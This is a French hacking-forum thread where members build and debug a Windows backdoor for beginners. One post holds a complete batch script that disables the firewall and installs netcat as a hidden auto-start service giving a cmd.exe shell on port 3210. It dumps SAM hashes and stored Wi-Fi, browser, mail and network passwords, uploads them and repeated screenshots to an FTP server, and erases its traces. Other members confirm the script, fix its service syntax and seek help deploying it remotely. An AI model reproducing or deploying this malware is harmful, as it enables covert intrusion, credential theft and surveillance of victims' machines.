Backdoor pour Noobz sous win

Dack · 19-06-2010 10:25:44

Merci pour le lien! Je vais le lire wink

Cr@Sh · 19-06-2010 12:48:59

Veidam,

Tu fais comme tu le sens, soit tu postes directement ton code,
soit tu me l'envoies et avec ton autorisation je couperai les morceaux de codes les plus intéressants (en laissant des indices) pour pousser à la recherche et évité le travaille tout cuit.

Comme j'ai fais pour toi wink

Veidam · 19-06-2010 14:06:37

salut Cr@sh je viens de t'envoyer un courriel avec la source d'origine je t'enverrais dans la nuit les codes de mon exemple pour un aperçu du truc et demain je met le liens

c bon si tu nous fait un tuto sur ceci je serais le premier a en être ravi j'apprendrais surement encore beaucoup grâce a toi alors merci de ta proposition contacte moi si besoin sur mon mail jetable je vais le surveiller

@++

NachtSchwarz · 04-07-2010 16:54:15

Salut !
J'ai pas tout compris, mais je progresse...
Cr@sh, la "ligne secrète", est-ce que c'est ça:

sc create SYSTEM binPath= c:\system32\system.exe -vv –d –L –p 3210 –e cmd.exe start= auto

Je suis pas du tout sûr, mais bon...

Voici mon listing.bat:

@echo off

del l33t-*.vbs /a 
set atr=attrib +H +S          
set l337-1=l337-%ComputerName%.txt     
set l337-2=l337-%ComputerName%.html     
set start=start /B /MIN /wait       
set cr=echo +---------------+       
set ba=echo. ^& echo. __________________________________________________________ ^& ^echo. 

%atr% Win-maj.exe   
%atr% l337-*   
%atr% *.bat   

echo. & echo . VEUILLEZ PATIENTER ENVIRON 1 min . & echo. & echo. 

if Exist %l337-1% del %l337-1% /a 
if Exist %l337-2% del %l337-2% /a 

%start% netsh advfirewall set currentprofile state off   
If ERRORLEVEL == 1 Goto XP       
echo advfirewall currentprofile OFF     

ver         
echo Firewall windows down     
%start% netsh firewall set opmode disable  
goto suite  

:XP           
echo.           
echo Car elle ne s'applique qu'a VISTA et s7ven   
%start% netsh firewall set opmode disable    
ver            
echo Firewall windows down       
echo Ok           
echo.           

:SUITE 
(echo ---- LANCEMENT DU SERVEUR ----)     
xcopy /Y system.exe %SystemRoot%\System32   
attrib +H +S %SystemRoot%\System32\system.exe   

sc create SYSTEM binPath= c:\system32\system.exe -vv –d –L –p 3210 –e cmd.exe start= auto
sc.exe start SYSTEM               
echo le fichier system.exe se trouve dans %SystemRoot%\System32\     
del system.exe  

echo. & echo. & echo. & echo --- RECUPERATION DES INFOS --- & echo. 

(echo.                                                            
%cr% & echo +   RECUP SAM   + & %cr% & l337-sam1-bkreg.exe bkreg.key & l337-sam2-pwdump7exe & %ba%
%cr% & echo +  NBTSTAT -N   + & %cr% & nbtstat -n & %ba%
%cr% & echo + IPCONFIG /ALL + & %cr% & ipconfig /all & %ba%                                
%cr% & echo + TASKLIST ALL  + & %cr% & tasklist.exe & %ba%                                        
%cr% & echo +   TASKLIST    + & echo +  svchost.exe  + & %cr%
tasklist.exe /svc /fi "imagename eq svchost.exe" & %ba%) > %l337-1% & del bkreg.key

%start% l337-wirelesskeyview.exe /shtml wirelesskeyview.l337   
more wirelesskeyview.l337 > %l337-2% & del *.l337     

%start% l337-netrouteview.exe /shtml netrouteview.l337 
more netrouteview.l337 >> %l337-2% & del *.l337   

%start% l337-iepv.exe /shtml iepv.l337 
more iepv.l337 >> %l337-2% & del *.l337 

%start% l337-livecontactsview.exe /shtml livecontactsview.l337 
more livecontactsview.l337 >> %l337-2% & del *.l337 

%start% l337-mailpv.exe /shtml mailpv.l337 
more mailpv.l337 >> %l337-2% & del *.l337 

%start% l337-mspass.exe /shtml mspass.l337 
more mspass.l337 >> %l337-2% & del *.l337 

%start% l337-netpass.exe /shtml netpass.l337 
more netpass.l337 >> %l337-2% & del *.l337

%start% l337-netresview.exe /shtml netresview.l337 
more netresview.l337 >> %l337-2% & del *.l337  

%start% l337-passwordfox.exe /shtml passwordfox.l337 
more passwordfox.l337 >> %l337-2% & del *.l337 

%start% l337-produkey.exe /shtml produkey.l337 
more produkey.l337 >> %l337-2% & del *.l337

del l337-*.exe /a &%atr% %l337-1% & %atr% %l337-2% 

echo.           
echo . CREATION DU FICHIER "%l337-1%" ...... OK   
echo.           
echo . CREATION DU FICHIER "%l337-2%" ....... OK   
echo.           

:Erreurdeping       
ping google.com       
IF ERRORLEVEL==1 goto Erreurdeping   
echo ** le ping a reussi **  

(echo open ftp.***.fr & echo ***& echo ***& echo mput l337-* & echo bye) > ftp.txt 

ftp.exe -i -s:ftp.txt   

echo.         
echo . DELETE LES TRACES ........ OK   
echo         
del l337-* /a        

:Erreurdeping2       
ping google.fr       
IF ERRORLEVEL==1 goto Erreurdeping2   
echo ** le ping a reussi **     
for /L %%a in (1,1,3) do (     
echo essai %%a       

nircmd.exe loop 3 5000 savescreenshot scr_~$currdate.MM-dd-yyyy$_~$currtime.HH.mm.ss$s.pngL337         
(echo open ftp.***.fr & echo ***& echo ***& echo mput *.pngL337 & echo bye) > ftp.txt 
ftp.exe -i -s:ftp.txt                         

del *.pngL337      
ping google.com     
IF ERRORLEVEL==1 goto Erreurdeping2 
) 

del ftp.txt; nircmd.exe; Listing.bat /a

Est-il juste ? (je précise que j'ai écrit l337 et non l33t)
Merci d'avance... big_smile

Dernière modification par NachtSchwarz (04-07-2010 17:22:39)

Cr@Sh · 04-07-2010 18:15:25

sc create SYSTEM binPath= c:\system32\system.exe -vv –d –L –p 3210 –e cmd.exe start= auto

Il te manques 5% (tu l'as quasi trouvé)

ok je comprend pquoi tu del l33t dès le début (mais .vbs c'est inutile, vu que le reste est l337)

--> (echo ---- LANCEMENT DU SERVEUR ----) <-- parenthèse inutile

sinon tout est juste

NachtSchwarz · 04-07-2010 19:05:00

OK, merci beaucoup !
Je réfléchi à ces 5% !
(je te remercie doublement car cette expérience m'a permi de modifier une variable de la base de registre qui me bloquait l'accès aux fichiers cachés) wink

Dernière modification par NachtSchwarz (04-07-2010 20:11:14)

NachtSchwarz · 04-07-2010 20:07:24

EUH !
le truc, ça serait pas

sc create SYSTEM binPath= C:\WINDOWS\system32\system.exe -vv –d –L –p 3210 –e cmd.exe start= auto

???
Si c'est ça, je lol ! (c'est obligé^^)

Cr@Sh · 04-07-2010 20:27:01

regarde toute la ligne

sc create SYSTEM binpath= <-- il manque ici --> %SystemRoot%\System32\system.exe -vv -d -L -p 3210 -e cmd.exe start= auto <-- et ici

NachtSchwarz · 04-07-2010 21:13:39

ok, merci pour cet indice wink
Je m'aide avec ceci:
http://support.microsoft.com/kb/251192

hmmmm...
serait-ce
sc create SYSTEM binpath= "%SystemRoot%\System32\system.exe -vv -d -L -p 3210 -e cmd.exe" start= auto error= ignore

Dernière modification par NachtSchwarz (04-07-2010 21:20:41)

Cr@Sh · 04-07-2010 21:18:43

Comme c'est le we, c'est K-do:

error=normal, severe, critical, ignore
Gravité de l'erreur si le service ne démarre pas pendant le démarrage.
(valeur par défaut = normal)

1 chance sur 4 wink

[Edit:] Oups, j'avais pas fait gaffe , mais oui c'est "ignore" (tu as réédité ton msg avec le code ? ou c'est moi qui hallu)

il te manque quand même une partie entre les deux :

binpath= "%SystemRoot% <-- on va pas tourner au tour du pot, vu que c'est un truc tout con et que tu as l'air de piger le truc, pense à une commande dos

NachtSchwarz · 04-07-2010 21:31:47

Oui oui, j'ai edit big_smile
T'es normal !
donc y manque quelque chose entre binpath et "%SystemRoot% ?
Ok, je continue à chercher... wink

EDIT:

sc create SYSTEM binpath= "\"%SystemRoot%\System32\system.exe -vv -d -L -p 3210 -e cmd.exe"" start= auto error= ignore

Dernière modification par NachtSchwarz (04-07-2010 21:41:06)

Veidam · 05-07-2010 01:02:37

ah ça fait plaisir de voir quelqu'un s'intéresser a ce poste

Bienvenue NachtSchwarz mais si je peut me permettre ta backdoor ne marchera pas avec netcat si tu ne le paramètre pas en remote shell enfin si tu l'utilise en local ok mais pas en extérieur

sinon c bien d'alimenter ceci

@ plus

NachtSchwarz · 05-07-2010 09:36:47

Salut Veidam !
Oui, je sais pour le reverse Shell (il y a quelques temps j'avais programmmé un trojan en python et j'avais été confronté au même problème). Je suis aussi en train de lire ton tuto smile

NachtSchwarz · 02-08-2010 14:04:28

Juste un petit message comme ça, je suis très heureux que Crack-wpa soit de retour. Je vais de ce pas me remettre à cette backdoor, qui, me semble t-il, est pratiquemment finie (j'y est fait quelques modifs, histoire que ce soit fun wink ).
Merci à vous pour cet excellent forum.

kiissme · 23-01-2011 03:46:40

J'ai un problème il envoi pas les données !
ce log va dans le bon fichier puis déconnecte donc je me suis connecté sur le Ftp avec le log pour voir si les droit sont bien mis et oui donc je vois pas d'ou cela viens !

Sinon il ce lance bien malgré qu'il ne sois pas du-tout discret (deux demande autorisation d'exe) wirlesskeyview,netpass et les fichiers créer comme les screen et autre ne sont pas cacher meme si ils sont effacer automatiquement !

Je suis sous win 7 et à la fin j'ai un message d'erreur qui dit :

 Script: C:\l33t.Start.vbs
Ligne: 5
Erreur : Cet objet ne gènere pas cette propriété ou cette méthode: "WScrpt.qui"
Code: 800A01B6
Source Erreur d'exécution Microsoft VBScript

Dim shell, commande
Set shell = WScript.CreateObject("WScript.Shell")
commande="Listing.bat"
shell.Run commande, 0,true
WScript.qui

Voila merci pour ce tuto instructif moi qui avais aucune connaissance en DoS
Je suis Aussi ton tuto sur Wifizoo mais je bloc sur certain points !
Déjà moi aircrack-ng me trouve une wep erroné genre( A1A1A1A1A1A1A1A1A1A1A1A1A1) donc peut pas choper la wep pour decripter mes paquets avec wifizoo et sionon si je met la box en opn et aidump-ng en focus dessus wifizoo dans l'onglet BSSiD je vois divers points ainsi que le mien mais je chope rien malgré que je me connecte a divers sites gmail,hotmail,facebook ....

Merci de ton temp et ta passion dévorante smile

Dernière modification par kiissme (23-01-2011 03:56:22)

RipX · 01-02-2012 21:21:16

Hello tout le monde,

Merci beaucoup sur ce joli tuto qui m'a beaucoup apprit! J'ai suivi le déroulement des étapes, je ne pense pas avoir trop d'erreurs dans mon script puisque quand je le lance en local il fait bien ce qu'il est censé faire...j'ai tout compilé dans un seul .exe pour plus de simplicité avec "bat to exe converter"
Maintenant je cherche comment faire fonctionner netcat mais j'ai quelques soucis, pouvez-vous m'aider svp? Je ne comprends pas les lignes de codes malgré les nombreux tutos que j'ai lu (français et anglais) dessus.

Le déroulement est simple pourtant : lancement de netcat, scan des ports, connection, injection et enfin exécution de l'exe...

Merci de votre aide!

Discussion	Réponses	Vues	Dernier message
SOS astuce pour installer antenne râteau directionnel par donjuandemarco	0	12	Aujourd'hui 20:53:19 par donjuandemarco
Probème Crack Wep sous Ubuntu par Kratos96 [ 1 2 3 ]	52	958	16-05-2012 16:30:48 par Kratos96
Optimisation de dico pour BBox Sagem et Réseaux neuronaux par manonyme [ 1 2 ]	28	1835	15-05-2012 20:10:57 par manonyme
[SecuObs.com] Nouveau firmware 2.0.0 disponible pour le point d'accès malicieux WiFi Pineapple MarK IV par SecuObs.com	0	49	15-05-2012 03:30:17 par SecuObs.com
Rogue AP sous Android: apparemment, c'est possible ! par superbobo	0	117	10-05-2012 20:25:27 par superbobo

Crack-wifi.com FORUM

Annonce

#51 19-06-2010 10:25:44

Re : Backdoor pour Noobz sous win

Annonce

#52 19-06-2010 12:48:59

Re : Backdoor pour Noobz sous win

#53 19-06-2010 14:06:37

Re : Backdoor pour Noobz sous win

#54 04-07-2010 16:54:15

Re : Backdoor pour Noobz sous win

#55 04-07-2010 18:15:25

Re : Backdoor pour Noobz sous win

#56 04-07-2010 19:05:00

Re : Backdoor pour Noobz sous win

#57 04-07-2010 20:07:24

Re : Backdoor pour Noobz sous win

#58 04-07-2010 20:27:01

Re : Backdoor pour Noobz sous win

#59 04-07-2010 21:13:39

Re : Backdoor pour Noobz sous win

#60 04-07-2010 21:18:43

Re : Backdoor pour Noobz sous win

#61 04-07-2010 21:31:47

Re : Backdoor pour Noobz sous win

#62 05-07-2010 01:02:37

Re : Backdoor pour Noobz sous win

#63 05-07-2010 09:36:47

Re : Backdoor pour Noobz sous win

#64 02-08-2010 14:04:28

Re : Backdoor pour Noobz sous win

#65 23-01-2011 03:46:40

Re : Backdoor pour Noobz sous win

#66 01-02-2012 21:21:16

Re : Backdoor pour Noobz sous win

Annonce

Sujets similaires

Pied de page des forums

Les vidéos Crack-wifi.com: crack WEP, crack WPA, rogue AP, Airolib-ng, Pentest...

Les vidéos de Syfer: Backtrack 4 R1, Metasploit, SSLStrip, SET, Compiz...

Le coin des bonnes affaires, achats informatiques: